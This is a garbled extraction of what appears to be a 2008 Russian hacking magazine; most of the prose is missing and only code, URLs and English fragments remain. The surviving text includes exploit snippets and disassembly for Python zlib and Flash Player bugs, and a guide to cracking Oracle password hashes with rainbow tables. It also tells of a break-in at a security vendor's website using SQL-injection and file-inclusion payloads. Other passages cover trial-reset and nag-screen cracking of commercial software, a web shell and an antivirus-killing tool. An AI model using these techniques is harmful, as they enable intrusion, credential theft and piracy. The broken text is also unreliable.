Microsoft
: blogs.technet.
com/swi/archive/2008/04/09/ms08020how-predictable-is-the-dnstransaction-id.aspx.
,
Security Focus: www.securityfocus.
com/bid/28553/info.
>> Targets
NT-
(32
64 ).

>> Exploit
exploit
Amit Klein: www.
trusteer.com/docs/Microsoft_
Windows_resolver_DNS_cache_
poisoning.pdf.
>> Solution

DNS-
(, SMALL
HTTP),
DNS-
TCP-,
53UDP
Proof-of-concept exploit
x 05 /113/ 08
>>
zlib
DNS-.
02
Borland
InterBases
libc, KERNEL32.
DLL, .
(/Server 2008)
shell-,
, ,
,
InterBase ibserver.
>> Brief
>> Targets:
11 2008 Borland
InterBase,

. Oracle Corporation,
( )
Zhen
Hua Liu,
Redwood.

ibserver.exe,

.
,
( DVD).

( ),
.

,
shell-. XP SP2/Server SP1

DEP
return2libc (
DEP
). , ,
UNIX, Windows
Borland
Interbase 2007 SP2 (ibserver.exe
version 8.0.0.123).
, , , .
x 05 /113/ 08
>> Exploit

proof-of-concept exploit, shell-.
:
www.securityfocus.com/data/
vulnerabilities/exploits/28730.pl.
>> Solution
zlib.
Python,

,
. PyZlib_unflush,
Python2.5.2/Modules/zlibmodule.c.
(flush)
,

( ;

).

,
.
, .
,
.
. , ,

, ,

flush(). ,
Python-
,
, shell
Python-.

,
.
( )

.
?
.
,
Python

,
- .
www.securityfocus.
com/bid/28715.
>> Targets
Python 2.5.2,
.
>> Exploit
proof-of-concept
exploit www.securityfocus.
com/data/vulnerabilities/exploits/
28715.py, :

proof-of-concept exploit
compMsg =
zlib.compress(msg)
bad = -24
decompObj =
zlib.decompressobj()
decompObj.decompress
(compMsg)
decompObj.flush(bad)
>> Solution
,
SVN-
(bugs.python.org/issue2586). -

.
04
Adobe
Flash
Player

.
ibserver.exe,
.
Python
03

zlib
>> Brief
Justin Ferguson IOActive
Security Advisory 9

$1450 CANVAS Professional

exploit!
049
>>
>> Targets
Adobe Flash Player 8.0.34.0/8.0.35.0/9/9.0.115.0/9.0.28.0/9.0.31.0/9.0.45.0/
9.0.47.0/9.0.48.0 ( RedHat Enterprise Linux Desktop/RedHat
Enterprise Linux Extras/RedHat Enterprise Linux Supplementary server/
S.u.S.E. Linux 10.1 ppc/S.u.S.E. Linux 10.1 x86/S.u.S.E. Linux 10.1 x86-64/
S.u.S.E. Novell Linux Desktop 9/S.u.S.E. openSUSE 10.2/S.u.S.E. openSUSE
10.3 ).
>> Exploit
Proof-of-concept exploit Immunity CANVAS
Early Update Program. $1450 3 (
$730 ). : www.immunityinc.com/products-canvas.
shtml.
>> Solution
Flash Player 9.0.124.0,
,
, www.adobe.com/support/security/bulletins/
apsb08-11.html. , , . SceneCount
( , !), AVM- , . -
- ,
. (
)
.
SWF-
>> Brief
9 2008 Mark Dowd ISS X-Force, IBM,
wushi team509
Adobe Flash Player, Linux.
swf- (,
web- ). ,
Adobe Flash Player ! - , , Windows
Linux, swf-
DefineSceneAndFrameLabelData.
SceneCount, ,
. SceneCount
, ,
(, ) .
, ,
Adobe Flash Player ,
Linux. ( Flash
Player)
, Mark Dowd
, flash-,
- ActionScript
Virtual Machine (, , AVM). ,
-, , , -, .
- ,
exploit ,
Adobe Flash Player: x86, x86-64, PPC, etc.
Mark Dowd Application-Specific Attacks:
Leveraging the ActionScript Virtual Machine, : documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf.
Security Focus: www.securityfocus.
com/bid/28695.
050
Full disclose
Flash-player, (
), SWF/FLV-, ( 9),
Macromedia: download.macromedia.com/pub/flash/licensing/file_
format_specification_v9.pdf.
! pdf- , .
. -
Adobe Acrobat Reader , NAG-Screen
Agree
() Disagree ( :)).
SWF-
: , , , , etc. (
). DefineSceneAndFrameLabelData,
(Scene),
.
DefineSceneAndFrameLabelData . , Scenes.
SceneCount unsigned int32 (
), .
DefineSceneAndFrameLabelData
(tag ID 0x56),
//
SceneData
{

UI32 FrameOffset

String SceneName
}
FrameData
{

UI32 FrameNumber

String FrameLabel
x 05 /113/ 08
>>

; , SC < 0
.text:30087A72
push eax

; EAX := 0, SC < 0
.text:30087A73
mov ecx, esi
.text:30087A75
call sub_3004A766

;
.text:30087A7A
and [ebp+arg_0], 0
.text:30087A7E
cmp dword ptr [esi+4], 0
.text:30087A82
jle short loc_30087AFA

;
, pdf
}
//
DefineSceneAndFrameLabelData
{

RecordHeader Header

UI32 SceneCount

SceneData Scenes[SceneCount]

UI32 FrameCount

FrameData Frames[FrameCount]
}
flash-player , SceneCount Scenes:
Flash Player,

.text:30087A42
call SWF_GetEncodedInteger

; Scene Count
mov edi, [ebp+arg_0]
.text:30087A47
.text:30087A4A
mov [esi+4], eax

; EAX := Scene Count
mov ecx, [ebx+8]
.text:30087A4D

; ECX swf-
sub ecx, [ebx+4]
.text:30087A50

; ECX -
cmp eax, ecx
.text:30087A53

; ?(Scene Count > ECX)
jg loc_30087BB4
.text:30087A55

; <- , SC < 0
test eax, eax
.text:30087A5B

;
jz loc_30087B0E
.text:30087A5D

; <- , SC < 0
.text:30087A63
mov ecx, [edi+20h]
.text:30087A66
push 3
.text:30087A68
push 3
.text:30087A6A
push 0Ch

; nCount
.text:30087A6C
push eax
; nSize
.text:30087A6D
call mem_Calloc
x 05 /113/ 08
SceneCount ,
swf-.
JG, SceneCount
. SceneCount < 0, ( ),
, ;
SceneCount .
, , ! ,
!
... SceneCount mem_
Calloc(), .
,
mem_Calloc(), , 2 . , ,
, ,
, . , mem_Calloc()
. ,
. ( ):
,

.text:30087AFA
mov eax, [esi+4]

; SceneCount
.text:30087AFD
mov ecx, [esi]

; returned pointer
.text:30087AFF
lea eax, [eax+eax*2]

; EAX := EAX*3
.text:30087B02
lea eax, [ecx+eax*4]

; EAX := EAX*4 + pointer
.text:30087B05
mov ecx, [ebp+arg_8]

; ECX := FrameCounter ( FC)
.text:30087B08
sub ecx, [eax-0Ch]

; ECX := FC-*((SC-1)*12+pointer)
.text:30087B0B
mov [eax-4], ecx

; *(SC*12+pointer-4) = ECX
pointer, mem_Calloc(),
, : *(SeneCount*12-4) =
FrameCount-*((SceneCount-1)*12). ,
SceneCount FrameCount ,
, ,
. , . ?
: (0x80000000 |
((address + 4)/12)), ,
12 .
!
(, ). ,
, , , ,
,
. ,
, ! z
051
>>
sh2kerr
Login:
Pasword:
Login:
Pasword:
Login:
Pasword:
Login:
Pasword:
Oracle,
, ,
Oracle. , ,
? ? ,
? , .
(DBA). , ,
DBA, ,
. , , , ,
, , , ssh-
. ? ,
. , .
1.
SQL- WEB-,
. , ,
, .
2. ,
( SELECT ANY DICTIONARY), DBA. , , DBA ,
.
3. ,
PL/SQL Injection ,
SELECT ANY DICTIONARY,
. , http://milw0rm.com/exploits/4995.
052
,
. Oracle, ,
, ?

Oracle
. . Oracle
11 dba_users.
SYS.USER$, DBA_USERS
(VIEW) ,
. , DBA_USERS.
, :
SQL> select username, password from DBA_USERS;

, Password ,
8 . ?

Oracle , Assessment
of the Oracle Password Hashing Algorithm Joshua Wright Carlos
x 05 /113/ 08
Login:
Login:
Pasword:
Pasword:
Login:
Login:
Pasword:
Pasword:
>>
DBA_USERS
Assessment of the Oracle Password Hashing Algorithm
Ci. Oracle.
: http://www.isg.rhul.ac.uk/~ccid/publications/
oracle_passwd.pdf.
Oracle
11G.
. :

SYS
test1, SYStest1;
,
SYSTEST1;
, ,
(0x00);
( ) DES CBC , 0x0123456789ABCDEF;
DESCBC,
.
,
.
1. (salt) , .

(rainbow tables),
.
2. ,
, 256 .
,
256-26=230 .
, UPPER()
. 164 ,
( ,
http://www.
petefinnigan.com/forum/yabb/YaBB.cgi?board=ora_sec;a
ction=display;num=1131556773). ,

Oracle ,
. .
x 05 /113/ 08
SQL> create user test01 identified by abc123_

$#;
dvd
User created.
SQL> create user test02 identified by 123abc#_
$;
create user test02 identified by 123abc#_$
*
ERROR at line 1:
ORA-00988: missing or invalid password(s)
SQL> create user test02 identified by _123abc;

create user test02 identified by _123abc
*
ERROR at line 1:
ORA-00911: invalid character
SQL> create user test02 identified by
abc123^*;
create user test02 identified by abc123^*
*
ERROR at line 1:
ORA-00922: missing or invalid option

,

Oracle.
warning
!

!
,
!
SQL> create user test02 identified by

"^*abc?";
User created.
, , ( ORA-00911: invalid character).
:
1. (26),
(10) _,#,$ (3), 39 .
2.
.
053
Login:
Login:
Login:
Login:
Pasword:
Pasword:
Pasword:
Pasword:
>>
orabf woorabf core 2 duo 2.4
3. ,
. ,
. :
, .
30-60 .

.
, (
).
,
, , 39 , .
8 26*39^7= 3.6 *10^12 .
(http://www.
red-database-security.com/whitepaper/oracle_passwords.html),
,
( core 2 duo 2.4
1.6
woraauthbf,
).
, 8
, 40 . , ,
. ,
,
(salt).
9 , .
, ,
.
Rainbow Tables
Oracle
(salt), , ,

(rainbow tables). (salt)
( , ,
), , rainbow tables
.
SYS SYSTEM,
(DBA).
Rainbow tables, ,
. , ,

Oracle.
054
Oracle Rainbow Tables

rainbow Oracle, , - ,
. ,
winrtgen, cain&abel.
, .
. :
Hash . oracle.
Min Len , 0.
Max Len ; 7.
Index (
). .
Chain Len .
, . 20000. 2400.
Chain Count , .
1 , 67018864,
,
. 1 .
.
N of Tables . , ,
,
. .
Charset , . Oracle 39 ,
.
Username . Oracle .
SYSTEM.
, .
, , (Success
probability) 44 , .
x 05 /113/ 08
Login:
Login:
Login:
Login:
Pasword:
Pasword:
Pasword:
Pasword:
>>
rainbow
-, 99
, .
8 (99,00) 12 (99,91).
( Benchmark) -
24 Intel Celeron 2.4.
1 : ,
.
, 25
, , (,
7).
?, .
, , ,
LM/NTLM/MD5 www.freerainbowtables.com.
. ,
. , . winrtgen,
,
tables.lst.
:
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#000.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#001.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#002.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#003.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#004.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#005.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#006.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#007.rt;
x 05 /113/ 08
,

tables.lst winrtgen.
harset charset.
txt . , ,
. - charset.
txt ( oracle):
# charset configuration file for winrtgen v1.2
by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by
Zhu Shuanglei <shuanglei@hotmail.com>
byte
alpha
alpha-space
.
.
.
oracle
123456789_#$]
video
DVD ,

Oracle.
= []
= [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
= [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0
, .
, ,
winrtgen,
winrtgen1.exe winrtgen2.exe
(
tables.lst).

12
7 . SYSTEM .
2 3 ; , -
055
>>
winrtgen 7
, 4 . ,
?
!
7 . 8
Success Rate 99,00%,
64 (
).
, , , .
60 ,
! 8 ,
, ,
web-: http://dsecrg.ru.
Oracle 11g
Oracle 11.
11 ,
. , .
DBA_USERS,
.
Oracle Database 11g Enterprise Edition Release
11.1.0.6.0 Production
With the Partitioning, OLAP, Data Mining and Real
Application Testing options
SQL> select username, password from dba_users;
USERNAME
------------------MGMT_VIEW
SYS
SYSTEM
DBSNMP
PASSWORD
-----------------------
, , .
SUS.USER$ , ,
(DBA). SELECT ANY DICTIONARY
.
:
SQL> select user, password, spare4 from sys.user$;
056
0 SYS
77E6B621F3BB777A
19.02.08
0
0
1
0
3 15.10.07
1
0 DEFAULT_CONSUMER_GROUP
0
S:52D6AC184EDE6D952E94317CB1C9918D2766C34A23C476E460D
72BD03F2C
, .
77E6B621F3BB777A, Oracle 10g, . ,
. 20
sha-1 , 10 salt.
, .
-, -,
. -,
. , , .
, Oracle ,
, , - . ,
OC Windows LM/NTLM-. ,
, ,
14 ,
. Oracle : ,
, ,
. , ,
.
, LM/NTLM-:
,
( ,
). ,
passwd. ,
, PassWd.
,
(cain&abel),
THC-Orakel ( Oracle 11g),
. , SHA-1 . ,

Oracle. ,
. , , . z
x 05 /113/ 08

,
-.
,
,

, -
, .

-,

.
,
.

.
!
, - ,
.
$65 ,
, - ,
-.
, .

. .

.
: , ,
. 10
, , , . ,
, .
: .
, -
.
, ! ,
15 2008

www.mobilkinofest.ru. WAP- (wap.mtscity.ru),
.
, ,
www.mobilkinofest.ru,
-. .
, ,
,
.
, , , ,
.
? !
: .
>>
- ?
? !
Agnitum! -, Agnitum.com
.
, .
, ?
, , , , ,
.

: misterBlack, misterWhite ,
.
, . , - .
. , Anatoly
Skoblov, 2001-2004, .
HTML ( ).
aboutphone.info/phorum, PHP-
. ,
: Phorum
. 100%
meta-.
<meta name="PhorumVersion" content="3.4.3a" />
<meta name="PhorumDB" content="mysql" />
<meta name="PHPVersion" content="4.4.7" />
misterBlack:
. . , Outpost Firewall. ... ?, .
Agnitum.com, . agnitum.
ru, , FR... .
Polski , outpost.pl. ( ) Joomla 1.0.9. ,
, IP- agnitum.com outpost.pl , . ,
( seologs.com/ip-domains.html), , , , , ,
, . !
aboutphone.info ( , ).
058
.
. .
[Critical SQL-inj uriauth() Phorum<=3.4.7 ]
www.securityfocus.com/archive/1/360635
:http://localhost/
phorum347/list.php?f=1&phorum_uriauth=waraxe%2527%20AN
D%20mid(password,2,1)=3/*:foobar,
, . ! , ,
, ,
.
x 05 /113/ 08
>>
Hack-day
,
misterWhite, .
misterWhite:
!
- !
. , - RSS.
...
Agnitum? , !
misterBlack:
, , .
isterWhite SQL, ,
. , , :
ICQ-
misterBlack:
misterWhite: ,
,
misterWhite: phorum_
cookieauth.
misterWhite:
Phorum.
.
5 ,
,
.
3 ,
. , , ,
- .
.
Phorum,
.
uriauth()
(- waraxe).
, : ..if
there is empty $admin_session and not exists
COOKIE variable $phorum_cookieauth, then (and
only then) urldecoded $phorum_uriauth will
be exploded.. match : Before
testing user must be logged out ,
!
,
,
.
,
.
, 5
,
. .
, 5
.
. misterBlack

,
...
.

.
, www.plain-text.info.
,
( , ..) . misterWhite
.
, MySQL 4.0.
. ,
, File_Priv
false.
misterWhite:
. : Phorum
. ,
, .
.
$PHORUM[admin_url],
, misterBlack
.
! , ,
, . ,

/ .
,
- , .
.
.
misterBlack:
, !
http://aboutphone.info/phorum/control.
,
misterWhite .
misterWhitea , -
, . , .
, ,
, . , , , PHP 4.4.7 .
misterWhite:
unset()- (PHP <=
4.4.3, 5.1.4):
/phorum3.4.x//phorum/index.
php?PHORUM[settings_dir]=[RFI]?&1267903400=1&-1079377568=1
/phorum3.4.x/phorum/index.
php?PHORUM[f]=[LFI]&-1267903400=1&1079377568=1
/phorum3.4.x/download.php?PHORUM[fileid]=[LF
I]%00.txt&-1267903400=1&-1079377568=1
/phorum3.4.x/admin/index.
php?help=123&lang=[LFI]
info
phpPgAdmin

PostgreSQL
. : phppgadmin.
sourceforge.net.

PHP www.
suphp.org.
suPHP

Apache (mod_suphp)

.

PHP-
. suPHP

Apache suExec
.
suphp ,
mod_php 25 ,

suexec
( 36
).

,

: madnet.
name/tools/madss
, domainsdb.com
,
www.seologs.com
?
: http://search.
msn.com/results.
aspx?first=1&FORM=
PERE&q=ip%3A77.8
8.21.11
misterBlack:
misterBlack:
.
. x 05 /113/ 08
! , misterWhite
.php ,
.
059
>>
/etc/passwd
: ? (
).
www.aboutphone.info/phorum/download.php?1,57/
SS7.jpg.
.
:
$info=$HTTP_SERVER_VARS["QUERY_STRING"];
$file=basename($info);
$args=explode(",", basename(dirname($info)));
$fileid=(int)$args[1];
$filename="$AttachmentDir/$ForumTableName/$fileid".
strtolower(strrchr($file, "."));
$AttachmentDir .
: /attach_from_phorum.
, . $ForumTableName
.
ifconfig
ICQ-log
misterWhite:
misterWhite:
misterWhite:
misterWhite:
phorum/ph1/

-
)
http://aboutphone.info/attach_from_
,
ph1.
. .htaccess
, .
, SAFE_MODE=ON
/home/sites/home/users/skoblov/.
, ,
.
, phpinfo()
mod_include ( SSI ).
.htaccess , ,
, :
misterWhite:

.
, $ForumTableName , . ALTER
TABLE .
.
misterBlack:

. :
AddHandler server-parsed .txt

AddHandler server-parsed .html
, html- ExecCGI.
, !
test.txt

, :
Linux s1.agnitum.com 2.6.9-55.ELsmp #1 SMP Fri Apr 20
16:36:54 EDT 2007 x86_64
/skoblov.

.
misterWhite:
, - uid/guid.
, , uid/guid
. , , ,
, .
.
misterBlack:
phpinfo()
060
, Agnitum.com.

x 05 /113/ 08
>>
video

,
.
Web- Agnitum
Safemod OFF!

agnitum/agnitum. ,
,
MySQL, PostgreSQL.
PostgreSQL 7.4.17 on x86_64redhat-linux-gnu,
compiled by GCC gcc (GCC) 3.4.6 20060404 (Red
Hat 3.4.6-3)
misterWhite:
PostgreSQL .
, .

. information.schema,
mssql mysql5. , r57 cyberlordsSQL, misterBlacky.
misterBlack:
phpPgAdmin, .
, , , , .
, 2005/2006
. , .
, , , Softkey.ru.
, , , , .
open_basedir disable_
functions . , PHP, ???
.
Happy End!
misterWhite:
.
? ?
? , ,
? ,
300? ,
Agnitum ?
. , ,
. , - . . :). SQL Phorum
( )
.
misterBlack:
warning
!

! ,

!
dvd
,
,
.
, , , . , ,
, .
, ! :) z
misterWhite:
, :
;
/etc/init.d /etc/rc.d/
, ,
;
proftpd
, ;
, , , .
support

,
. display_error=OFF
.
x 05 /113/ 08
061
>>
_A1!3N
R
DE
A
LO
, ,
, ,
,
,
. ,
,
.
FindWindow-SendMessage, ,
. ,
.
.
- .
.
FindWindow-SendMessage
nagscreen, . Total
Commander. , .
,
, ,
. ,
. :
1.
2.
062
3.
4.

ASM, Win32 API.
Visual Studio,
Delphi-Builder.
, WinExec (
CreateProcess ,
). :
UINT WinExec(
LPCST lpCmdLine, // exe ,
UINT uCmdShow //
);
(
Sleep()). .
:
x 05 /113/ 08
>>
LOADER
HyperSnap ,

LOADER
LOADER
Digalo 2000 , 15
static CWnd* PASCAL FindWindow(

LPCTSTR lpszClassName,
//
LPCTSTR lpszWindowName
//
);
static CWnd* FindWindowEx(
//
HWND hwndParent,
HWND hwndChildAfter, //
LPCTSTR lpszClass, //
LPCTSTR lpszWindow //
. FindWindow
, FindWindowEx
, (Button, Edit, List, Panel . ..).
, , .
Visual Studio Tools Spy++ . Total
Commander Spy++.
, Window 000305CB
Total commander TNASTYNAGSCREEN, :
000305CB ( ),
Total commander ,
TNASTYNAGSCREEN
, , Total
Commander - .
Window 00010630 1 TPanel.

. GetWindowText.
int GetWindowText
(
HWND hWnd,
LPTSTR lpString,
int nMaxCount
);
//
//
//

. FindWindow
TNASTYNAGSCREEN; FindWindowEx x 05 /113/ 08
MathMagic Personal 3.6. ,
TNotebook,
NagPage; TPanel , , TPanel ( ).
:
, , ,
, , BM_CLICK Button (
). SendMessage BM_CLICK. HANDLE
.
LRESULT SendMessage(
HWND hWnd,

// ,
UINT Msg,
//
WPARAM wParam,

// ( )
LPARAM lParam // ( )
);
Total .
, .
:
hWnd = ::FindWindow("TTOTAL_CMD", NULL);
if(! hWnd)
,
Totala ( , Totala ). ,
. , ,
.
Hook, DLL API-. ,
15-20 . ,
Windows-Total Commandera
,
.
Spy++ Window Scanner
InqSoft. , , - (
). , ,
063
>>
R
DE
A
LO
LOADER
DER
LOA
Digalo 2000 DigaloRegister
Reflector Internet
.
.
DelTrialCounter-file
, . ,
, .
, (
trial- , ). MathMagic
Personal 3.6, 30 .
MathMagic Personal
3.6.INI Windows, ,
msnasec.dll \System32.
,
-.
:
1. (());
2. ;
3. ;
4. ;
5. .
1
Windows System . API-.
UINT GetSystemDirectory(
//
LPTSTR lpBuffer,

UINT uSize,
//
);
UINT GetWindowsDirectory(
//
LPTSTR lpBuffer,
windows
UINT uSize,
//
);
4 Total Commandera :).
R
DE
A
LO
MathMagic Personal 3.6. 30 uses
,
:
LONG RegOpenKeyEx(
HKEY hKey,
LPCTSTR lpSubKey,
DWORD ulOptions,
REGSAM samDesired,
PHKEY phkResult,
);
//
// = 0
//
//
. , hKey
: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_
MACHINE, HKEY_USERS.
LONG RegDeleteKey(
// , RegOpenKeyEx
HKEY hKey,
LPCTSTR lpSubKey // , RegOpenKeyEx
);
.
, RegDeleteKey ,
.
SHDeleteKey, .
,
()
. ,
Windows :).
Digalo 2000 Russian, .
, Digalo trial-.
.
Digalo Windows DigaloRegister.exe, Digalo
.
.
, :
DelTrialCounter-reg
. . -
064
1. ,
2. ( )
x 05 /113/ 08
>>
R
LOADE
WindowScanner
video
DVD ,

.
warning
, , Digalo . ,
. Diglio 2000
, (
) , ,
.
SetLocalTime

, -
, trial-. -
API-:
BOOL SetLocalTime(
const SYSTEMTIME* lpSystemTime
);
SYSTEMTIME
. SYSTEMTIME ,
. , , ,

.
. ,
.
.NET Reflector,
Freeware, , ,
is out of date do you want to
update automatically?. , . ,
:
1.
2. Reflector
3. ( Reflector
)
4.
5. ,

Reflector.exe.
x 05 /113/ 08
Combo
, , .

HyperSnap 6.
,
.
, .
, .
: trial-
Windows.
:
DWORD GetTempPath(
DWORD nBufferLength, //
MAX_PATH
LPTSTR lpBuffer // ,
);
!

!
,

!
dvd

.
Windows.
HyperSnap
.
, ,
, . :
1.
2.
3.
4.
5.
6.
7.
trial- (
). ,
--. ... :).
5.
, , ,
WM_ACTIVATE
SendMessage. ,
065
>>
Total
, Armadilo, SoftICE,
OllyDbg, IDA .

. ,
3D MAX, Nero 6.xx,
7x .
,
, , . ,
, , , , . .
MSDN, cracklab.ru, wasm.ru .
.
shareware- , . -
HyperSnap
066
LOA
DER
, trial-.
. ,
- (,
, ). , , . ,
, ,
. , , , , .
, .
, ,
. , ,
Assembler ( ASM,
, , ). VB.NET, ,
- .z
HyperSnap
x 05 /113/ 08
>>

C# A Z
.NET- , - . , Visual Basic/C# , hiew

-. , , crackme
.
.NET .

( ),
, p-
, ,
. , , . ,
, ,
!

, ,
.
1. Visual Studio 2008 Express.
MS, : Visual Basic, C#,
C++, ++ -.
W2K , Server 2003
(off-line install 894 .iso-): http://www.
microsoft.com/express/download/.
2. Mono 2.0 Beta for Windows. .NET
Novell, Linux Windows,
W2K, MS Framework. ,
( , ), , 71 :
http://www.go-mono.com/mono-downloads/download.html.
3. Standard ECMA-335/Common Language Infrastructure (CLI)/4th edition
(June 2006). , , -, ,
068
, 556 ( , pdf): www.ecma-international.org/publications/

standards/Ecma-335.htm. : www.ecma-international.
org/publications/files/ECMA-ST/Ecma-335.pdf.
4. CIL Instruction Set. - C# Online.NET free
encyclopedia , (
): http://en.csharp-online.net/CIL_Instruction_Set.
5. MSIL. Aquila (
WASM).
C#, ( ): www.wasm.ru/series.
php?sid=22.
6. Common Intermediate Language. CIL-
( .NET) Wikipedia
( ): ttp://en.wikipedia.org/wiki/
Common_Intermediate_Language.
7,8,9,10... .
DVD.
crackme
- .NET- !
, , , Microsoft
Visual Studio FAR + Colorer. IDE, , (
,
),
, .

.
x 05 /113/ 08
>>
crackme, C#,
. ,
. IDE , ,
.
n2k_crackme_01h.cs
//
using System;
class nezumi
//
{
static void Main()
{
// s
string s;

//
System.Console.Write("enter password:");
s = System.Console.ReadLine();

if (s == "nezumi") {
//
System.Console.WriteLine("hello, master!");
}
else {
System.Console.WriteLine("fuck you, hacker!");
}
}
}
IDE .NET- <F6>,
( csc.exe ,
):
$cl.exe /clr hello-clr.cpp

hello-clr.exe - RTL, -.
. , C# -
, .
, .

n2k_crackme_01h.exe HIEW,
<ENTER> , <F5>
, jmp _CorExeMain ;
mscoree.dll. , .
, jmp
.text,
, - .
hex-mode, ( !)
Unicode, , ,
. , ,
crackme
, .
HIEW , ++
hello-clr.exe. CorExeMain.
.NET , C#,
strcmp, gets, printf,
MSVCR90.DLL. P/Invoke, ,
,
-, . ,
, P/Invoke ! .NET-
.

$ csc.exe n2k_crackme_01h.cs
Mono csc.exe mcs/mcs.bat, , , n2k_crackme_01h.exe,
. ,
.
/CLR
CL.EXE ( /Ox
):
n2k_crackme_01h.exe IDA Pro , CIL- . - Java-. IDA

Pro , ,
,
(ECMA-335/Partition III/CIL Instruction Set).
, . Options Text
representation.
(Number of opcode bytes) . Line
prefixes , Function offsets,
Options, Comments
.NET hex-
x 05 /113/ 08
IDA Pro .NET
069
>>
Dotnet IL Editor IL- GUI-
Display auto comments

(,
CIL- ).
IDA Pro , ( ) . , , .
.
, Microsoft,
C:\WINDOWS\Microsoft.
NET\Framework\v2.0.50727\. ilasm.exe.
n2k_crackme_01h.exe.
, -, ,
, IDA Pro, (: ildasm.exe ,
View Show bytes).
.
( ,
). , : System.Console::
Write("enter password"), V_0 System.String::Equality(V_0,
"nezumi") . fuck off, hacker!,
brtrue.s IL_0031 (
2Dh 0Dh). .
,
brtrue.s IL_0031
nop ( 00h,
90h, x86). brtrue.s IL_0031 brFALSE.
s IL_0031.
, , . ECMA-335, ,
brfalse.s 2Ch , .

, HIEW? ?
, ? CIL- !

(), .
2Dh 0Dh 72h 2F 00h 00h 70h 28h ( , ? Ildasm
, IDA Pro , , :
). ,
, ,
, HIEW <F3>. 2Dh
2Ch, <F9> .
070
mdbg.exe
... ! ! ,
, , 123456
. ,
, ,
- !

,
. , .
-

mdbg.exe
help: , help
;
a[ttach]: .NET-;
b[reak]: ;
ca[tch]: (events),
;
conf[ig]: / ;
del[ete]: ;
de[tach]: .NET-;
g[o]: ;
n[ext]: Step Over;
o[ut]: Steps Out;
s[tep]: Step Into;
p[rint]: ;
q[uit]: ;
r[un]: ;
set: ;
setip: ;
sh[ow]: .
x 05 /113/ 08
>>
( ) .NET Microsoft
.NET-
ildasm.exe
. , ( ),
.
.
Microsoft Visual Studio ,
, , . ICorDebug-, .NET ( ,
..), API-.
.NET-, ,
ICorDebug Interface ,
() , Release-.
, ?!
!

.NET: , , ; ( Java, Visual Basic,
C++, C#, F#) -,
;
CLR: Common Language Runtime ( ) Microsoft .NET Framework,
;
CIL: Common Language Infrastructure , , ,
-;
MSIL: Microsoft Intermediate Language (
Microsoft) - .NET
Microsoft;
IL: Intermediate Language ( ) -
.NET , ECMA335.
x 05 /113/ 08
, .NET ( mdbg.
exe, m managed, )
pdb-.
? IDA Pro map-,
map2pdb - , .
, . ildasm.exe, ilasm.exe,
/pdb .
ildasm.exe ,
,
.
ildasm.exe ,
n2k_crackme_01h.exe (, ). File
Dump ( <CTRL-D>),
Dump options ( ) . , Dump IL
Code! OK (, cracked).

cracked.il cracked.res
. Cracked.il
, , brtrue.s IL_0031 brfalse.s IL_0031.
, .
:
$ilasm.exe cracked.il /pdb
cracked.exe cracked.pdb,
.
.
,
exe,
.
, $mdbg.exe cracked.exe
, Main (
). ?
, show
sh. :
sh, IL-
run cracked.exe

# cracked.exe
STOP: Breakpoint Hit
071
>>
.NET crackmes
Microsoft Visual Studio
IDA Pro .NET
ildasm.exe
.NET-, ++

# main
43: IL_0000: nop
#
[p#:0, t#:0] mdbg> sh
# "sh"
40
.maxstack 2
41
.locals init (string V_0, bool V_1)
43:*
IL_0000:
nop

#
44
IL_0001:
ldstr "enter password:"
45
IL_0006:
call
Console::Write(string)
[p#:0, t#:0] mdbg>
[mscorlib]System.

( help) .
. , , .
x86 .
cracked.il
IL_0020: stloc.1,
, System.String::op_Equality.
IL_0021: ldloc.1, V_1, -
072
IL_0022: brtrue.s IL_0031

IL_0031 ( ). . !
IL_0020: stloc.1,
55 cracked.il,
. mdbg.exe DVD
. - , , Dotnet IL Editor IL- GUI-, mdbg.exe - (
).
, . .NET-, .

, -
.NET-. ,
, . .
,
( ), (
) crackme, www.crackmes.de
( , .NET).
, ,
, ! z
x 05 /113/ 08
>>
x-tools
R0id
/ r0id@bk.ru /
: c99madshell
: Win/*nix
: madnet
c99shell
,
-. php, perl,
asp-. ,
. c99shell c99madshell.
- c99shell
, :

SQL-

PHP-
.htpasswd, config.
inc.php, suid, sgid, service.pwd,
bind_bash, .fetchmail, etc

SafeMode

(/
)
,
, :

(
, -
074
)

( ,
)
(
, 44 )
GET- ( POST-)

-
, (,
-
shell.php :)). , c99madshell
,

. , -
, .
: Vkontakte Search
: Win/*nix
: Hormold-

. ,

:
$id="";
// ID
$email="";
//
$password=md5("");//
$sex="1";
// , 1 ,
2 ( , ,
- :))
$city="1";
// ID
ID
:
49 , 60
61 , 72 ,
73 , 1 ,
87 , 95 ,
99 , 104 ,
110 , 119 --,
123 , 2 -
, ,

.
:
:)
-
. ,

.

, , , ,
. ,
.
Vkontakte Search. PHP

(, :)). -, ,
<?
error_reporting (E_ALL);
$file=file("log.txt");
for($i=0; $i < count($file); $i++){
list($id,$img,$nick,$rep)=explode(
":",$file[$i]);
echo "Id:$id($nick) <IMG
SRC=img/".$id."_".$img."> ";
echo $file[$i];
}
echo count($file);
?>

,
, , ,
x 05 /113/ 08
>>
. ,
,
, , .
,
, .
: StopAV
:Windows XP
: Dr.Samuil

,
(),
.
, ,
Dr.Samuil ,
, StopAV.
Delphi
.
:
McAffee AntiVirus 7.1 Enterprise
6.0
AVZ 4.29
1.90
Kaspersky Internet Security 7.0
Panda Antivirus 2008 (3.00.00)
WinAntiVirus Pro 2007
Trend Micro OfficeScan 7.0
NOD32 AntiVirus 2.7

,
, :

.
/
. ,
,
,
,
.
DVD
.
x 05 /113/ 08
: Anti Keylogger Shield

: Windows 2000/XP
: Amic Tools

( , ),
.

.
:

(,
:)),
? ,
,
,
. Anti Keylogger Shield

, , ,
. , Anti
Keylogger Shield -
. ,
, .
:

- ,
:).
: MouseRobot
: Windows 2000/XP
: AutomationBox
,
( )
(/). ,
MouseRobot
. ,
,
.

. MouseRobot
:

MouseRobot
.
,
,
,
,

,
CD DVD :
,
